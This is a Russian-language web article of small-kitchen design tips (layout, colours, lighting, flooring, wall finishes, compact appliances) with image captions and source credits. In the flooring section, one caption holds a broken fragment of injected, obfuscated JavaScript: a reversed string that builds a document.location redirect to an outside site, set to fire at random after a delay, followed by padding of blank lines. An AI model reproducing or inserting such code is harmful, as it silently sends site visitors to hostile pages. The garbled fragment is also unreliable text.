Добавить в закладки

8 идей для маленькой кухни

В небольших квартирах размеры кухни не всегда позволяют осуществить все желаемые задумки. С помощью некоторых хитростей можно выгодно обыграть пространство и превратить маленькую кухню в полноценное многофункциональное и уютное место в доме.

Метод 1. Перепланирование помещения

Очень часто из кухни есть выход на балкон. В таком случае есть возможность объединить помещения, разрушив перегородку. Утеплив балкон, продолжите в нем кухню или организуйте комфортную столовую. Также можно попытаться расширить кухню в сторону комнаты или коридора, ведущих на кухню.

Маленькая кухня, объединенная с лоджией и обустроенной на ней столовой

Маленькая кухня, объединенная с лоджией и обустроенной на ней столовой. Источник: prokuhni.info

Метод 2. Правильный цвет

Оформление маленькой кухни в белом, бежевом, персиковом, светло-оливковом цвете и других светлых пастельных тонах поможет создать эффект расширения пространства. Мебель и элементы декора, выполненные в контрастном цвете, станут акцентами в светлом интерьере.

Маленькая кухня в белом цвете

Маленькая кухня в белом цвете. Источник: malenkaya-kuhnya.com

Метод 3. Выбор выигрышного дизайнерского стиля

Наиболее уместными в кухне с небольшой площадью будет смотреться современный, классический или минималистический стиль. В них можно сочетать разные элементы отделки стен и потолка, мебели и элементов декора, которые позволят визуально увеличить рабочую площадь.

Маленькая кухня в классическом стиле

Маленькая кухня в классическом стиле. Источник: inha.ru

Метод 4. Освещение в нужных местах

Чтобы не загромождать пространство большой подвесной люстрой, но при этом освещать все рабочие участки, воспользуйтесь точечными лампами или светодиодной лентой. В центре кухни можно разместить люстру или несколько светильников, но следует помнить, что они должны быть компактных размеров.

Маленькая кухня, освещенная с помощью нескольких маленьких светильников на потолке и подсветкой рабочей зоны

Маленькая кухня, освещенная с помощью нескольких маленьких светильников на потолке и подсветкой рабочей зоны. Источник: malenkaya-kuhnya.com

Метод 5. Грамотный подход к настилу на полу

По традиции в кухне используется ламинат, линолеум или керамическая плитка разных размеров. Но поставив перед собой задачу по увеличению пространства, лучшим выбором для покрытия пола станет глянцевая керамическая плитка небольших размеров в белых, кремовых и бежевых цветах. Также ее можно комбинировать с плитками темного цвета. Укладка в шахматном порядке придаст оригинальности помещению.

Шахматная плитка на полу маленькой кухни

Шахматная плитка на полу маленькой кухни. Источник: www.tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tooyoo.ru

 

 

 

 

 

 

 

 

 

 

 

 

 

Деревянный ламинат светлых оттенков тоже неплохой вариант для маленькой кухни, однако, нужно учесть, что в небольших помещениях он кладется вдоль или по диагонали.

Метод 6. Отделка стен покрытиями, не крадущими пространство

Лучше всего стены маленькой кухни покрывать акриловой краской. Если все-таки хочется поклеить обои, то надо отдавать предпочтение светлым однотонным вариантам. Обеденную зону или рабочий фартук можно выложить глянцевой плиткой, которая будет отражать свет и добавит простора на кухне.

Приемом визуального увеличения помещения станет оборудование акцентной стены, которую можно отделать другим цветом, разместить зеркала или фотообои.

Метод 7. Соблюдение принципа рабочего треугольника

В кухне небольшого размера должна быть Г-образная расстановка мебели. Если форма помещения не позволяет прибегнуть к данному методу, то подойдет линейная.

 

Г-образная расстановка мебели на маленькой кухне Источник: jkuhnya.ru

 

 

 

 

 

 

 

 

 

 

 

Метод 8. Использование техники минимальных размеров

Однородные фасады на кухне со встроенной техникой небольших размеров не загромождают драгоценное пространство. Также для экономии места лучше покупать приборы, которые могут выполнять несколько функций как, к примеру, духовка-микроволновка.

Мини техника на небольшой кухне

Мини техника на небольшой кухне. Источник: i.pinimg.com

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

На маленькой кухне важно разместить все необходимые для работы элементы, поэтому при обустройстве дизайна нужно придерживаться минимализма и практичности.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 03.04.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: